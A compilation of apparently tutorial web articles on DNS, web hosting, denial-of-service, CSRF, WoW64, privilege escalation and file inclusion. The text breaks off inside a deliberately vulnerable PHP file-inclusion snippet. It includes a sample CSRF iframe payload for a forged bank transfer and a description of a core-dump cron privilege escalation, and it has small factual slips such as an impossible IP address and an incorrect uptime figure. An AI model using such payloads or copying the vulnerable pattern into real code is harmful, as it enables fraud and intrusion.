Domain Name System

What is Domain Name ?
A domain name is an identification string that defines a realm of administrative autonomy, authority or control on the Internet. Domain Name System, or DNS, is the most recognized system for assigning addresses to Internet web servers. Domain names are used to identify one or more IP addresses. Without a domain, you would have to tell your customers that your site is located at a temporary url such as 127.441.733.14/~mysite instead of using a domain name such as mysite.com, making your site appear unprofessional and impractical.

Root Name Server
A root name server is a name server for the root zone of the Domain Name System of the Internet. It directly answers requests for records in the root zone and answers other requests by returning a list of the authoritative name servers for the appropriate top-level domain (TLD).
Root Level domain : The Domain Name System is a hierarchical naming system for computers, services, or any resource participating in the Internet. The top of that hierarchy is the root domain. The root domain does not have a formal name and its label in the DNS hierarchy is an empty string.

Top Level Domain (TLD)
A top-level domain (TLD) is the last segment of the domain name. The TLD is the letters immediately following the final dot in an Internet address.The top-level domains (TLDs) such as com, net and org are the highest level of domain names of the Internet. Top-level domains form the DNS root zone of the hierarchical Domain Name System. Every domain name ends with a top-level domain label. For Example In our website www.geekyshows.com , com is Top Level Domian.

Restricted Top Level Domains
Restricted top-level domains (rTLDs), like .aero, .biz, .edu, .mil, .museum, .name, and .pro, that require the registrant to represent a certain type of entity, or to belong to a certain community. For example, the .name TLD is reserved for individuals, and .edu is reserved for educational entities.

Country Code Top Level Domain
Country-code TLDs (ccTLDs) represent specific geographic locations. For example: .mx represents Mexico and .eu represents the European Union. Some ccTLDs have residency restrictions. For example, .eu requires registrants to live or be located in a country belonging to the European Union. Other ccTLDs, like the ccTLD .it representing Italy, allow anyone to register them, but require a trustee service if the registrant is not located in a specified country or region. Finally, there are ccTLDs that can be registered by anyone — .co representing Colombia, for example, has no residency requirements at all.

Second-level domains (SLD)
A second-level domain (SLD) is the portion of the domain name that is located immediately to the left of the dot and domain name extension. You define the SLD when you register a domain name.

Example 1: The SLD in mysite.com is mysite. 

Example 2: The SLD in mysite.co.uk is still mysite.

Country code second level domains (ccSLD)
A country code second-level domain (ccSLD) is a domain name class that many country code top-level domain (ccTLD) registries implement. The ccSLD portion of the domain name is located between the ccTLD and the SLD. Example: The ccSLD in coolexample.co.uk is .co.

What is SubDomain Name
Subdomains are a smaller part of a larger domain. For example I have a Website www.geekyshows.com If i create a sub domain at www.geekyshows.com it will be look like this help.geekyshows.com . Here help is a subdomain.

Example – www.geekyshows.com, Example – help.geekyshows.com
DNS Hierarchy	Example Domain
Root level Domain	.
Top Level Domain	.com
Second Level Domain	geekyshows
Sub Domain	help

How Domain Names are Assigned
The Internet Corporation for Assigned Names and Numbers (ICANN) is the ultimate authority for domain-name assignments. ICANN conveys authority to (accredits) Registrars throughout the world to register second-level domains within specific top-level domains; this ensures that all domain names are unique.

What is Domain Name System (DNS)?
DNS is a protocol within the set of standards for how computers exchange data on the Internet and on many private networks, known as the TCP/IP protocol suite. Its basic job is to turn a user-friendly domain name like "geekyshows.com" into an Internet Protocol (IP) address like 70.44.241.54 that computers use to identify each other on the network.

How Domain Name Work ?
After Registering a Domain name the domain name must have a hosted website that includes a numeric address, called an IP address, for visitors to access the website using your domain name.
Your domain name and its associated IP address are stored in a common database along with every other domain and associated IP address that are accessible via the Internet.
When visitors enter your domain name into a Web browser, the browser request uses your domain name to find the domain name's associated IP address and, therefore, the website. People use domain names instead of IP addresses because it is easier to remember a name rather than a series of numbers.

Like it ? Share it.

Read More

Web Hosting

What is Website Hosting? 
A web hosting service is a type of Internet hosting service that allows individuals and organizations to make their website accessible via the World Wide Web. When you create website, it is composed of web pages having text, images, videos and other content for people to see them. However, people can see your website only when it is available on the Internet. To make your website available on the Internet, you have to store it on a computer called web server. When you buy some space on a web server and store your webpages there, your website becomes hosted and can be seen by anyone.

What is Web Server? 
A web server is the computer on which the web pages of your website are stored. It delivers or ‘serves’ the content of your website to the users through Internet. The computer which acts as server has to have very high specifications. It is also connected to the Internet through very powerful link. The web hosts or the web hosting companies have their own servers on which they rent out space to you so that you can host your website and make it accessible to the general public.

Who is Web Host?
Any person or company who owns a server and rents out web space for website hosting can be called the web host. Some web hosts do not own servers but rent a server from some large web hosting company and then resell the space under their own brand.The large web hosting companies even own their datacenter (collection of servers) where they can host millions of websites. Datacenters have many computer servers connected to the Internet with fast connections, back up and high security.

What are the Basic Features of a Web Hosting Plan? 
Disk Space - Disk space means the amount of storage space provided to you by your web hosting provider. You need disk space to store your web files composed of text, images, video, audio, etc.

Bandwidth - Bandwidth means the amount of data that a website can transfer over a period of time. It determines the speed of your website. More bandwidth means more speed. The less bandwidth your site has, the slower it takes for it to load.

Uptime - Uptime means the percentage of time that a hosting server stays up or running. 99.99% uptime would mean that your website will go down only for about 8 hours in a year while 98% uptime would mean that your website may remain down for about 7.3 days in a year.

Programming Services - The website hosting packages also let you create web pages with programming languages including HTML, PHP, ASP as well as databases.

Customer Service - This is one of the basic and most essential features that one should look for while selecting website hosting service. A good customer service will help you whenever you will feel trouble.

What are the Types of Web Server Hosting? 
Shared Hosting - Shared hosting refers to when your web site is hosted on a server along with many other customers' web sites. Your users won't know this - your web site is still configured as a separate web site on the server and can still have its own domain name etc. It is simply sharing the server with other web sites.The entry level websites don’t need high performance features and thus, shared hosting can fulfill their needs without having to pay larger amounts of money.

Dedicated Server Hosting - This is a server that hosts only your web site or web sites. This can give you more control over your web site. It can also help in ensuring that other customers' web sites don't impact on your web site. Using dedicated servers is much more expensive than shared hosting, but if your site receives lots of traffic or you have other requirements (such as extra security requirements), a dedicated server could be for you.

Cloud Server Hosting - It is new in the Market Based on the innovative cloud computing technologies, cloud hosting is done through multiple servers inter connected with each other. This is unlike shared or dedicated server hosting that are provided through only one server. The multiple servers acting as a single system has multiple advantages like load balancing, no single point of failure, non-reliance on a single server leading to higher security and also the facility to increase or decrease server resources as per your needs. It is also cost effective web hosting solution as the website hosting companies charge you for cloud hosting services on the basis of usage. As you can scale your resources up and down on a cloud server, you are able to use more resources only on the days when you expect higher traffic.

Virtual Dedicated Servers - Also known as virtual private servers, virtual dedicated servers are a low-cost alternative to dedicated servers. The web host can put many virtual servers on each machine, therefore reducing costs. When you log in to the virtual server, it appears as though you have your own dedicated server (even though other virtual servers are probably running on the same machine).

Reseller web hosting - It allows clients to become web hosts themselves. Resellers could function, for individual domains, under any combination of these listed types of hosting, depending on who they are affiliated with as a reseller. Resellers' accounts may vary tremendously in size: they may have their own virtual dedicated server to a colocated server. Many resellers provide a nearly identical service to their provider's shared hosting plan and provide the technical support themselves.

Why Do You Need Web Hosting?
A lot of people tend to think that registering a domain name is good enough to get a website active. What they fail to understand is that a domain is as good as your name, a name by which others may recognize you. In order to get a website active and live on the internet, you need to host a website. If you are seeking to build a website without taking web hosting services, registering domain names will serve no purpose. Having a web hosting account is very important in order to get a website hosted. A web hosting company makes it possible for your website to be accessed by everyone on the web.

Like it ? Share it.

Read More

Denial of Service (DoS)

A Denial of Service (DoS) attack is a malicious attempt to make a server or a network resource unavailable to users, usually by temporarily interrupting or suspending the services of a host connected to the Internet.

DoS and DDoS Attack

It is important to differentiate between Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks.

In a DoS attack, one computer and one internet connection is used to flood a server with packets, with the aim of overloading the targeted server’s bandwidth and resources.
A DDoS attack, uses many devices and multiple Internet connections, often distributed globally into what is referred to as a botnet. A DDoS attack is, therefore, much harder to deflect, simply because there is no single attacker to defend from, as the targeted resource will be flooded with requests from many hundreds and thousands of multiple sources.

Types of DoS Attacks

The most common type of Denial of Service attack involves flooding the target resource with external communication requests. This overload prevents the resource from responding to legitimate traffic, or slows its response so significantly that it is rendered effectively unavailable.
Resources targeted in a DoS attack can be a specific computer, a port or service on the targeted system, an entire network, a component of a given network any system component. DoS attacks may also target human-system communications (e.g. disabling an alarm or printer), or human-response systems (e.g. disabling an important technician's phone or laptop).
DoS attacks can also target tangible system resources, such as computational resources (bandwidth, disk space, processor time); configuration information (routing information, etc.); state information (for example, unsolicited TCP session resetting). Moreover, a DoS attack can be designed to: execute malware that maxes out the processor, preventing usage; trigger errors in machine microcode or sequencing of instructions, forcing the computer into an unstable state; exploit operating system vulnerabilities to sap system resources; crash the operating system altogether.
The overriding similarity in these examples is that, as a result of the successful Denial of Service attack, the system in question does not respond as before, and service is either denied or severly limited.

Types of DDoS Attacks

DDoS attacks can divided in three types:

• Volume Based Attacks - This type of attack includes UDP floods, ICMP floods, and other spoofed packet floods. The goal of this DDoS attack is to saturate the bandwidth of the attacked site. The magnitude of a volume-based attack is usually measured in Bits per second.
• Protocol Attacks - This type of DDoS attack consumes the resources of either the servers themselves, or of intermediate communication equipment, such as routers, load balancers and even some firewalls. Some examples of protocol attacks include SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. Protocol attacks are usually measured in Packets per second.
• Application Layer Attacks - Perhaps the most dangerous type of DDoS attack, application layer attacks are comprised of seemingly legitimate and innocent requests. The intent of these attacks is to crash the web server. SDome examples of application layer attacks include Slowloris, Zero-day DDoS attacks, DDoS attacks that target Apache, Windows or OpenBSD vulnerabilities and more. The magnitude of this type of attack is measured in Requests per second.

Symptoms and Manifestations

The United States Computer Emergency Readiness Team (US-CERT) defines symptoms of denial-of-service attacks to include:

• Unusually slow network performance (opening files or accessing web sites)
• Unavailability of a particular web site
• Inability to access any web site
• Dramatic increase in the number of spam emails received—(this type of DoS attack is considered an e-mail bomb)[2]
• Disconnection of a wireless or wired internet connection
• The term "hit offline" being used on you, then you (the target) may disconnect from the internet

Denial-of-service attacks can also lead to problems in the network 'branches' around the actual computer being attacked. For example, the bandwidth of a router between the Internet and a LAN may be consumed by an attack, compromising not only the intended computer, but also the entire network.
If the attack is conducted on a sufficiently large scale, entire geographical regions of Internet connectivity can be compromised without the attacker's knowledge or intent by incorrectly configured or flimsy network infrastructure equipment.

Methods of attack

A "Denial-of-Service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. There are two general forms of DoS attacks: those that crash services and those that flood services.
A DoS attack can be perpetrated in a number of ways. The five basic types of attack are:

• Consumption of computational resources, such as bandwidth, disk space, or processor time.
• Disruption of configuration information, such as routing information.
• Disruption of state information, such as unsolicited resetting of TCP sessions.
• Disruption of physical network components.
• Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

A DoS attack may include execution of malware intended to:[citation needed]

• Max out the processor's usage, preventing any work from occurring.
• Trigger errors in the microcode of the machine.
• Trigger errors in the sequencing of instructions, so as to force the computer into an unstable state or lock-up.
• Exploit errors in the operating system, causing resource starvation and/or thrashing, i.e. to use up all available facilities so no real work can be accomplished or it can crash the system itself
• Crash the operating system itself.

Preventing DoS and DDoS Vulnerabilities

Defending against Denial of Service attacks typically involves the use of a combination of attack detection, traffic classification and response tools, aiming to block traffic that they identify as illegitimate and allow traffic that they identify as legitimate. A list of prevention and response tools is provided below:

Firewalls
Firewalls can be setup to have simple rules such to allow or deny protocols, ports or IP addresses. In the case of a simple attack coming from a small number of unusual IP addresses for instance, one could put up a simple rule to drop all incoming traffic from those attackers.
More complex attacks will however be hard to block with simple rules: for example, if there is an ongoing attack on port 80 (web service), it is not possible to drop all incoming traffic on this port because doing so will prevent the server from serving legitimate traffic. Additionally, firewalls may be too deep in the network hierarchy. Routers may be affected before the traffic gets to the firewall. Nonetheless, firewalls can effectively prevent users from launching simple flooding type attacks from machines behind the firewall.

Some stateful firewalls, like OpenBSD's pf packet filter, can act as a proxy for connections: the handshake is validated (with the client) instead of simply forwarding the packet to the destination. It is available for other BSDs as well. In that context, it is called "synproxy".

Switches
Most switches have some rate-limiting and ACL capability. Some switches provide automatic and/or system-wide rate limiting, traffic shaping, delayed binding (TCP splicing), deep packet inspection and Bogon filtering (bogus IP filtering) to detect and remediate denial of service attacks through automatic rate filtering and WAN Link failover and balancing.
These schemes will work as long as the DoS attacks are something that can be prevented by using them. For example SYN flood can be prevented using delayed binding or TCP splicing. Similarly content based DoS may be prevented using deep packet inspection. Attacks originating from dark addresses or going to dark addresses can be prevented using Bogon filtering. Automatic rate filtering can work as long as you have set rate-thresholds correctly and granularly. Wan-link failover will work as long as both links have DoS/DDoS prevention mechanism.

Routers
Similar to switches, routers have some rate-limiting and ACL capability. They, too, are manually set. Most routers can be easily overwhelmed under DoS attack. Cisco IOS has features that prevent flooding, i.e. example settings.

Application Front-end Hardware
Application front end hardware is intelligent hardware placed on the network before traffic reaches the servers. It can be used on networks in conjunction with routers and switches. Application front end hardware analyzes data packets as they enter the system, and then identifies them as priority, regular, or dangerous. There are more than 25 bandwidth management vendors.

IPS Based Prevention
Intrusion-prevention systems (IPS) are effective if the attacks have signatures associated with them. However, the trend among the attacks is to have legitimate content but bad intent. Intrusion-prevention systems which work on content recognition cannot block behavior-based DoS attacks.
An ASIC based IPS may detect and block denial of service attacks because they have the processing power and the granularity to analyze the attacks and act like a circuit breaker in an automated way.
A rate-based IPS (RBIPS) must analyze traffic granularly and continuously monitor the traffic pattern and determine if there is traffic anomaly. It must let the legitimate traffic flow while blocking the DoS attack traffic.

DDS Based Defense
More focused on the problem than IPS, a DoS Defense System (DDS) is able to block connection-based DoS attacks and those with legitimate content but bad intent. A DDS can also address both protocol attacks (such as Teardrop and Ping of death) and rate-based attacks (such as ICMP floods and SYN floods).
Like IPS, a purpose-built system, such as the well-known Top Layer IPS products, can detect and block denial of service attacks at much nearer line speed than a software based system.

Blackholing and Sinkholing
With blackholing, all the traffic to the attacked DNS or IP address is sent to a "black hole" (null interface, non-existent server, ...). To be more efficient and avoid affecting network connectivity, it can be managed by the ISP.
Sinkholing routes to a valid IP address which analyzes traffic and rejects bad ones. Sinkholing is not efficient for most severe attacks.

Clean Pipes
All traffic is passed through a "cleaning center" or a "scrubbing center" via various methods such as proxies, tunnels or even direct circuits, which separates "bad" traffic (DDoS and also other common internet attacks) and only sends good traffic beyond to the server. The provider needs central connectivity to the Internet to manage this kind of service unless they happen to be located within the same facility as the "cleaning center" or "scrubbing center".

Like it ? Share it.

Read More

Cross-site Request Forgery

Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

Key Concepts of Cross-Site Request Forgery

• Malicious requests are sent from a site that a user visits to another site that the attacker believes the victim is validated against.
• The malicious requests are routed to the target site via the victim’s browser, which is authenticated against the target site.
• The vulnerability lies in the affected web application, not the victim’s browser or the site hosting the CSRF.

Executing a CSRF Attack

In a Cross Site Request Forgery attack, the attacker is exploiting how the target web application manages authentication. For CSRF to be exploited the victim must be authenticated against (logged in) to the target site. For instance let’s say examplebank.com has online banking that is vulnerable to CSRF. If I visit a page containing a CSRF attack on examplebank.com but am not currently logged in, nothing happens. I am logged in however, the requests in the attack will be executed as if they were actions that I had intended to do.
Let’s look at how the attack described above would work in a bit more detail. First let’s assume that I’m logged in to my account on examplebank.com which allows for standard online banking features, including transferring funds to another account.
Now let’s say I happen to visit somemalicioussite.com. It just so happens that this site is trying to attack people who bank with examplebank.com and have setup a CSRF attack on their site. The attack will transfer $2500.00 to their account, which is account number 123456789. Somewhere on somemalicioussite.com attackers have added this line of code:
<iframe src="http://examplebank.com/app/transferFunds?amount=2500&destinationAccount=123456789">
Upon loading that iframe, my browser will send that request to examplebank.com which my browser has already logged in as me. The request will be processed and send $2500.00 to account 123456789.

Limitations

Several things have to happen for cross-site request forgery to succeed:

• The attacker must target either a site that doesn't check the referrer header (which is common) or a victim with a browser or plugin bug that allows referer spoofing (which is rare).
• The attacker must find a form submission at the target site, or a URL that has side effects, that does something (e.g., transfers money, or changes the victim's e-mail address or password).
• The attacker must determine the right values for all the form's or URL's inputs; if any of them are required to be secret authentication values or IDs that the attacker can't guess, the attack will fail.
• The attacker must lure the victim to a Web page with malicious code while the victim is logged in to the target site.

Note that the attack is blind; i.e., the attacker can't see what the target website sends back to the victim in response to the forged requests, unless they exploit a cross-site scripting or other bug at the target website. Similarly, the attacker can only target any links or submit any forms that come up after the initial forged request if those subsequent links or forms are similarly predictable. (Multiple targets can be simulated by including multiple images on a page, or by using JavaScript to introduce a delay between clicks.)

Given these constraints, an attacker might have difficulty finding logged-in victims or attackable form submissions. On the other hand, attack attempts are easy to mount and invisible to victims, and application designers are less familiar with and prepared for CSRF attacks than they are for, say, password-guessing dictionary attacks.

Preventing Cross-Site Request Forgery (CSRF) Vulnerabilities

The most common method to prevent Cross-Site Request Forgery (CSRF) attacks is to append unpredictable challenge tokens to each request and associate them with the user’s session. Such tokens should at a minimum be unique per user session, but can also be unique per request. By including a challenge token with each request, the developer can ensure that the request is valid and not coming from another source other than the user.

Individual Web users using unmodified versions of the most popular browsers can do relatively little to prevent cross-site request forgery. Logging out of sites and avoiding their "remember me" features can mitigate CSRF risk; not displaying external images or not clicking links in spam or untrusted e-mails may also help.

Browser extensions such as RequestPolicy (for Mozilla Firefox) can prevent CSRF by providing a default-deny policy for cross-site requests. However, this can significantly interfere with the normal operation of many websites. The CsFire extension (also for Firefox) can mitigate the impact of CSRF with less impact on normal browsing, by removing authentication information from cross-site requests. The NoScript extension mitigates CSRF threats by distinguishing trusted from untrusted sites, and removing payloads from POST requests sent by untrusted sites to trusted ones.

Web sites have various CSRF countermeasures available:

• Requiring a secret, user-specific token in all form submissions and side-effect URLs prevents CSRF; the attacker's site cannot put the right token in its submissions[1]
• Requiring the client to provide authentication data in the same HTTP Request used to perform any operation with security implications (money transfer, etc.)
• Limiting the lifetime of session cookies
• Ensuring that there is no clientaccesspolicy.xml file granting unintended access to Silverlight controls.
• Ensuring that there is no crossdomain.xml file granting unintended access to Flash movies
• Verifying that the request's header contains a X-Requested-With (used by Ruby on Rails before v2.0 and Django before v1.2.5), or checking the HTTP Referer header and/or HTTP Origin header. These protections have been proven insecure under a combination of browser plugins and redirects which can allow an attacker to provide custom HTTP headers on a request to any website, hence allowing a forged request.

An easy and effective solution is to use a CSRF filter such as OWASP's CSRFGuard. The filter intercepts responses, detects if it is a html document and inserts a token in to the forms and optionally inserts script to insert tokens in ajax functions. The filter also intercepts requests to check that the token is present.

A variation on this approach is to double submit cookies for users who use JavaScript. If an authentication cookie is read using JavaScript before the post is made, JavaScript's stricter (and more correct) cross-domain rules will be applied. If the server requires requests to contain the value of the authentication cookie in the body of POST requests or the URL of dangerous GET requests, then the request must have come from a trusted domain, since other domains are unable to read cookies from the trusting domain.

Checking the HTTP Referer header to see if the request is coming from an authorized page is commonly used for embedded network devices because it does not increase memory requirements. However a request that omits the Referer header must be treated as unauthorized because an attacker can suppress the Referer header by issuing requests from FTP or HTTPS URLs. This strict Referer validation may cause issues with browsers or proxies that omit the Referer header for privacy reasons. Also, old versions of Flash (before 9.0.18) allow malicious Flash to generate GET or POST requests with arbitrary HTTP request headers using CRLF Injection. Similar CRLF injection vulnerabilities in a client can be used to spoof the referrer of an HTTP request.

To prevent forgery of login requests, sites can use these CSRF countermeasures in the login process, even before the user is logged in.

Sites with especially strict security needs, like banks, often log users off after (for example) 15 minutes of inactivity.

Using the HTTP specified usage for GET and POST, in which GET requests never have a permanent effect, is good practice but is not sufficient to prevent CSRF. Attackers can write JavaScript or ActionScript that invisibly submits a POST form to the target domain. However, filtering out unexpected GETs prevents some particular attacks, such as cross-site attacks using malicious image URLs or link addresses and cross-site information leakage through <script> elements (JavaScript hijacking); it also prevents (non-security-related) problems with aggressive web crawlers and link prefetching.

Cross-site scripting (XSS) vulnerabilities (even in other applications running on the same domain) allow attackers to bypass CSRF preventions.

Like it ? Share it.

Read More

WoW64

WoW64 (Windows 32-bit on Windows 64-bit) is a subsystem of the Windows operating system capable of running 32-bit applications and is included on all 64-bit versions of Windows - including Windows XP Professional x64 Edition, IA-64 and x64 versions of Windows Server 2003, as well as 64-bit versions of Windows Vista, Windows Server 2008, Windows 7 and Windows 8. In Windows Server 2008 R2 Server Core, it is an optional component.
WoW64 is designed to take care of many of the differences between 32-bit Windows and 64-bit Windows, particularly involving structural changes to Windows itself.

Translation Libraries

The WoW64 subsystem comprises a lightweight compatibility layer that has similar interfaces on all 64-bit versions of Windows. It aims to create a 32-bit environment that provides the interfaces required to run unmodified 32-bit Windows applications on a 64-bit system. Technically, WoW64 is implemented using three dynamic-link libraries (DLLs):

1. Wow64.dll, the core interface to the Windows NT kernel that translates between 32-bit and 64-bit calls, including pointer and call stack manipulations
2. Wow64win.dll, which provides the appropriate entry-points for 32-bit applications
3. Wow64cpu.dll, which takes care of switching the processor from 32-bit to 64-bit mode

Registry and File System

The WoW64 subsystem also handles other key aspects of running 32-bit applications. It is involved in managing the interaction of 32-bit applications with the Windows components such as the Registry, which has distinct keys for 64-bit and 32-bit applications. For example HKEY_LOCAL_MACHINE\Software\Wow6432Node is the 32-bit equivalent of HKEY_LOCAL_MACHINE\Software (although 32-bit applications are not aware of this redirection). Some Registry keys are mapped from 64-bit to their 32-bit equivalents, while others have their contents mirrored, depending on the edition of Windows.

The operating system uses the %SystemRoot%\system32 directory for its 64-bit library and executable files. This is done for backward compatibility reasons, as many legacy applications are hardcoded to use that path. When executing 32-bit applications, WoW64 transparently redirects 32-bit DLLs to %SystemRoot%\SysWoW64, which contains 32-bit libraries and executables. 32-bit applications are generally not aware that they are running on a 64-bit operating system. 32-bit applications can access %SystemRoot%\System32 through the pseudo directory %SystemRoot%\sysnative.

There are two Program Files directories, both visible to both 32-bit and 64-bit applications. The directory that stores the 32 bit files is called Program Files (x86) to differentiate between the two, while the 64 bit maintains the traditional Program Files name without any additional qualifier.

Incompatible Applications

32-bit applications that include only 32-bit kernel-mode device drivers, or that plug into the process space of components that are implemented purely as 64-bit processes (e.g. Windows Explorer) cannot be executed on a 64-bit platform. Service applications are supported.
The SysWOW64 folder located in the Windows folder on the OS drive contains several applications to support 32-bit applications (e.g. cmd.exe, useful to register 32bit windows services, odbcad32.exe, to register ODBC connections for 32-bit applications). 16-bit legacy applications for MS-DOS and early versions of Windows are usually incompatible with 64-bit versions of Windows Vista, 7 and 8, but can be run on a 16-bit or 32-bit Windows OS via Microsoft Virtual PC or DOSBox. 32-bit versions of Windows XP, Vista, 7, and 8, on the other hand, can usually run 16-bit apps with few to no problems.
The component that makes this possible, Windows on Windows 32-bit, is replaced in 64-bit Windows OSs by WoW64, rendering nearly all 16-bit apps unexecutable.

Internet Explorer is implemented as both a 32-bit and a 64-bit application because of the large number of 32-bit ActiveX components on the Internet that would not be able to plug into the 64-bit version. The 32-bit version is used by default and the 64-bit version cannot be set to be the default browser.

Read More

Privilege Escalation

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.
Privilege escalation means a user receives privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used. Privilege escalation occurs in two forms:

1. Vertical privilege escalation, also known as privilege elevation, where a lower privilege user or application accesses functions or content reserved for higher privilege users or applications (e.g. Internet Banking users can access site administrative functions or the password for a smartphone can be bypassed.)
2. Horizontal privilege escalation, where a normal user accesses functions or content reserved for other normal users (e.g. Internet Banking User A accesses the Internet bank account of User B)

Vertical Privilege Escalation 

This type of privilege escalation occurs when the user or process is able to obtain a higher level of access than an administrator or system developer intended, possibly by performing kernel-level operations.

Examples of vertical privilege escalation
In some cases a high-privilege application assumes that it will only be provided with input that matches its interface specification, and doesn't validate the input. An attacker may then be able to exploit this assumption so that unauthorized code is run with the application's privileges:

• Some Windows services are configured to run under the Local System user account. A vulnerability such as a buffer overflow may be used to execute arbitrary code with privilege elevated to Local System. Alternatively, a system service that is impersonating a lesser user can elevate that user's privileges if errors are not handled correctly while the user is being impersonated (e.g. if the user has introduced a malicious error handler)
• Under some legacy versions of the Microsoft Windows operating system, the All Users screensaver runs under the Local System account - any account that can replace the current screensaver binary in the file system or Registry can therefore elevate privileges.
• In certain versions of the Linux kernel it was possible to write a program that would set its current directory to /etc/cron.d, request that a core dump be performed in case it crashes and then have itself killed by another process. The core dump file would have been placed at the program's current directory, that is, /etc/cron.d, and cron would have treated it as a text file instructing it to run programs on schedule. Because the contents of the file would be under attacker’s control, the attacker would be able to execute any program with root privileges.
• Cross Zone Scripting is a type of privilege escalation attack in which a website subverts the security model of web browsers so that it can run malicious code on client computers.
• There are also situations where an application can use other high privilege services and has incorrect assumptions about how a client could manipulate its use of these services. An application that can execute Command line or shell commands could have a Shell Injection vulnerability if it uses unvalidated input as part of an executed command. An attacker would then be able to run system commands using the application's privileges.
• Texas Instruments calculators (particularly the TI-85 and TI-82) were originally designed to use only interpreted programs written in dialects of TI-BASIC; however, after users discovered bugs that could be exploited to allow native Z-80 code to run on the calculator hardware, TI released programming data to support third-party development. (This did not carry on to the ARM-based TI-Nspire, for which jailbreaks have been found but are still actively fought against by Texas Instruments.)
• Some versions of the iPhone allow an unauthorised user to access the phone while it is locked.

Jailbreaking

A jailbreak is the act or tool used to perform the act of breaking out of a chroot or jail in UNIX-like operating systems or bypassing digital rights management (DRM).
In the former case, it allows the user to see files outside of the filesystem that the administrator intends to make available to the application or user in question. In the context of DRM, this allows the user to run arbitrarily defined code on devices with DRM as well as break out of chroot-like restrictions. The term originated with the iPhone/iOS jailbreaking community and has also been used as a term for PlayStation Portable hacking; these devices have repeatedly been subject to jailbreaks, allowing the execution of arbitrary code, and sometimes have had those jailbreaks disabled by vendor updates.
iOS systems including the iPhone, iPad, and iPod touch have been subject to iOS jailbreaking efforts since they were released, and continuing with each firmware update. iOS jailbreaking tools include the option to install Cydia, a third-party alternative to the App Store, as a way to find and install system tweaks and binaries. To prevent iOS jailbreaking, Apple has made the device boot ROM execute checks for SHSH blobs in order to disallow uploads of custom kernels and prevent software downgrades to earlier, jailbreakable firmwares. In an "untethered" jailbreak, the iBoot environment is changed to execute a boot ROM exploit and allow submission of a patched low level bootloader or hack the kernel to submit the jailbroken kernel after the SHSH check.
A similar method of jailbreaking exists for S60 Platform smartphones, which involves installing softmod-style patches which involves patching certain ROM files while loaded in RAM or edited firmware (similar to the M33 hacked firmware used for the PlayStation Portable) to circumvent restrictions on unsigned code. Nokia has since issued updates to curb unauthorised jailbreaking, in a manner similar to Apple.

Prevention Strategies

Operating systems and users can use the following strategies to reduce the risk of privilege escalation:

• Data Execution Prevention
• Address space layout randomization (to make it harder for buffer overruns to execute privileged instructions at known addresses in memory)
• Running applications with least privilege (for example by running Internet Explorer with the Administrator SID disabled in the process token) in order to reduce the ability of buffer overrun exploits to abuse the privileges of an elevated user.
• Requiring kernel mode code to be digitally signed.
• Use of up-to-date antivirus software
• Patching
• Use of compilers that trap buffer overruns
• Encryption of software and/or firmware components.

Horizontal Privilege Escalation

Horizontal privilege escalation occurs when an application allows the attacker to gain access to resources which normally would have been protected from an application or user. The result is that the application performs actions with the same but different security context than intended by the application developer or system administrator; this is effectively a limited form of privilege escalation (specifically, the unauthorized assumption of the capability of impersonating other users).

Examples of horizontal privilege escalation
This problem often occurs in web applications. Consider the following example:

• User A has access to his/her bank account in an Internet Banking application.
• User B has access to his/her bank account in the same Internet Banking application.
• The vulnerability occurs when User A is able to access User B's bank account by performing some sort of malicious activity.

This malicious activity may be possible due to common web application weaknesses or vulnerabilities. Potential web application vulnerabilities or situations that may lead to this condition include:

• Predictable session ID's in the user's HTTP cookie
• Session fixation
• Cross-site Scripting
• Easily guessable passwords
• Theft or hijacking of session cookies
• Keystroke logging

Preventing Privilege Escalation Vulnerabilities

Review those logs
Time-consuming, tedious, and absolutely necessary for the health of your network: review your log files. Once you understand what "normal" looks like for your network, you're more likely to spot dangerous abnormalities.
What should you look for? In two words: weird stuff. Examples: You know John is on vacation at Disney World, and his laptop is sitting in your office, but someone keeps logging into your network as John. Time to investigate. If, normally, your Web server can run six weeks at a time without requiring a reboot, but it rebooted itself three times last night, some attacker may be trying to perfect his buffer overflow attack against it. If your database server is locked in a closet in your server farm but the log files report a console login attempt on that server (which has no keyboard), investigate further. Get the idea?

Keep up-to-date on patches
Another painful but necessary task. We're surprised to see the Frethem virus spreading as we write this, because it works primarily on Internet Explorer systems that have not been updated in over a year. A diligent sys admin may patch daily. Lately, advisories about buffer overflows are being reported in the popular press. You can't assume "no one knows about them." Plug all known holes.

Use passphrases
We have often advised in LiveSecurity articles, "Use strong passwords." The problem with passwords that are cryptographically strong (e.g., "1@3gg]+nP915f~") is that no one can remember them, and they're hard to type. A nice balance between that and a too-easy password (e.g., "John") is the pass phrase. Try using bits of poetry, lines from plays or movies, anything lengthy but memorable. In Star Wars: A New Hope, an embarrassed Han Solo tells his mocking sidekick Chewbacca, "Laugh it up, fuzzball." Modified slightly to "L4ugh it up, Fu22ball!" you have a strong passphrase, hard for an attacker to brute force or guess, but easy for you to live with. Pick your own favorite. Just don't read it from anything hanging near your workstation.

Manage settings aggressively
Sure, it's easier to set your firewall to permit "Any" to "all." But that's not secure. Work out a security policy that grants employees the minimum amount of access they need to do their jobs. Then set your routers, switches, and firewalls to enforce the policy. While you're at it, consider installing interdepartmental firewalls: that way, if an attacker breaks in somewhere, you've limited the damage to a smaller network segment.

Further countermeasures are really up to application developers. Buffer overflows don't succeed in a well-written program. But you can't do a lot about that right now. What you can do is make sure your people use strong credentials, then protect those credentials.

Read More

File Inclusion

File inclusion attack is an attack in which an attacker can execute a file in a webpage. This type of attack can happen due to the improper filtering of user data supplied. Due to this vulnerability the attacker can execute script, stole data. By leveraging the vulnerability in PHP an attacker can execute command to do different attacks.
File inclusion attack are of two type :

1. Local File Inclusion.
2. Remote File Inclusion.

Local File Inclusion (LFI)

In LFI the attacker can take the advantage of improper filtering and can take advantage. The following PHP vulnerable to LFI :

<?php
$file = $_GET['file'];
if(isset($file))
{
